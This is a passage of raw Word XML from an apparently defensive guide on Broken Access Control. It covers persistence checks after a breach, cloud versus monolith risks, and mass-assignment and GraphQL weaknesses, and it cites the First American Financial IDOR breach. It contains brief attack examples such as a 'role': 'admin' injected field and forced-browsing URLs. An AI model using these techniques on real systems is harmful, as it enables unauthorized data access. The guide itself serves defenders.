    <w:p w14:paraId="0593DCD1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Check for Backdoors &amp; Persistence Mechanisms:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attackers who gain administrative privileges through broken access control often install persistence mechanisms. Review the system configuration to ensure the attacker didn't:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148AECAF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Create new unauthorized administrative accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A6B63D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Generate permanent API tokens or SSH keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA12A3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Upload malicious files (like web shells) via administrative upload utilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4599ADD6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Clean Restore and Post-Mortem:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wipe the compromised environment and rebuild affected server containers using fresh, verified images from your secure CI/CD pipeline. Once the system is verified clean, update your security regression test suite to include automated test payloads designed to attempt to break access control on this exact endpoint, ensuring the patch cannot be accidentally reverted in future code updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AED48B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Context &amp; Variations (The Modern Landscape)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C9E41" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Environment Differences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F00193"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The shift from legacy infrastructure to decentralized architectures has fundamentally altered how Broken Access Control occurs and how it must be contained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237935B4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Traditional Monolithic On-Premise Applications:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In a monolith, access control is usually handled by a centralized, stateful security filter (like a single session-check middleware) managing a monolithic user database. When access control breaks here, it typically happens because a developer forgot to wrap an explicit code </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>restriction around a specific page or routine. The blast radius is immediate: once inside, the attacker can access any table within the shared, central database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0DF0EF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Modern Cloud-Native / Serverless / Microservices:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In a distributed architecture, applications are split into dozens of isolated, stateless microservices or Serverless functions (e.g., AWS Lambda). Since there is no single monolithic engine, access control must be managed at </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>every single hop</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE10A05" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">If a company relies entirely on an </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>API Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle authorization but leaves individual internal microservices completely unprotected, an attacker who manages to slip past the gateway or exploit a single service can move laterally through the internal cloud network completely unhindered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A2BC4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">In serverless setups, misconfigured </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IAM (Identity and Access Management) roles</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> can grant a simple data-fetching function excessive write or delete privileges over cloud storage buckets (like AWS S3) or NoSQL databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E091F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>API vs. Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B30BB1B"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As frontends migrate toward headless models, the presentation layer is decoupled from data delivery, changing the methods used to exploit authorization weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1786FAA4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Traditional Web Frontend:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In legacy web apps, the server handles rendering. Access control often relied heavily on session cookies (JSESSIONID, PHPSESSID). Attackers targeted structural navigation patterns, using </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Forced Browsing</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to guess administrative hidden pages (like changing /dashboard to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>admin_panel.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>) or relying on parameter tampering embedded directly in HTML hidden input fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304A148F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Headless APIs (REST / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In modern architectures, the frontend is just a cosmetic consumer of structural endpoints. The entire attack surface shifts to raw JSON/XML parameter payloads and endpoint logic routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25038785" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Massive Parameter Binding:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> APIs often take JSON objects and map them directly into backend models. Attackers manipulate request fields by injecting parameters the developer never intended them to modify (e.g., adding "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>is_premium</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>": true or "role": "admin" into a registration or profile update payload).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1372BD6E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exposure:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unlike REST, which has distinct endpoints, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> relies on a single endpoint (e.g., /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>graphql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">) running complex data queries. If object-level access controls aren't verified at the specific </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Resolver</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> level, an attacker can restructure their query to fetch completely unauthorized, nested object fields (e.g., requesting a public product but nesting private customer lookup objects inside it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D9DCB5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Real-World Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F4EAFD"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lastRenderedPageBreak/>
        <w:t>The First American Financial Breach (2019)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E7C095"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 xml:space="preserve">One of the most notable public examples of Broken Access Control—specifically an </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Insecure Direct Object Reference (IDOR)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability—occurred at First American Financial, a major US real estate title insurance giant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD3D158" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>What Went Wrong:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The company hosted a web application that stored sensitive real estate transaction documents, including bank account numbers, tax records, social security numbers, and driver's license images. The application generated direct, sequential links to these documents based on a simple record identification number in the URL (e.g., </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="0083079C">
          <w:rPr>
            <w:rStyle w:val="Heading4Char"/>
            <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://example.com/documents/000102345</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>). The backend completely lacked an authorization check to verify if the person requesting the document link actually owned or had a legal right to view it. Anyone with a valid link could simply alter the digits sequentially to pull up other random client documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B13062B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Fallout:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Over </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>885 million sensitive, private land title records</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> dating back to 2003 were left exposed to the open internet. The security failure led to severe reputational damage, extensive forensic investigations, and a substantial </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>$487,616 penalty</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> issued by the U.S. Securities and Exchange Commission (SEC) for failing to maintain disclosure controls and procedures surrounding cyber vulnerabilities, alongside massive downstream litigation costs from affected consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E07A5D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Advanced Detection &amp; False Positives</w:t>
      </w:r>
    </w:p>
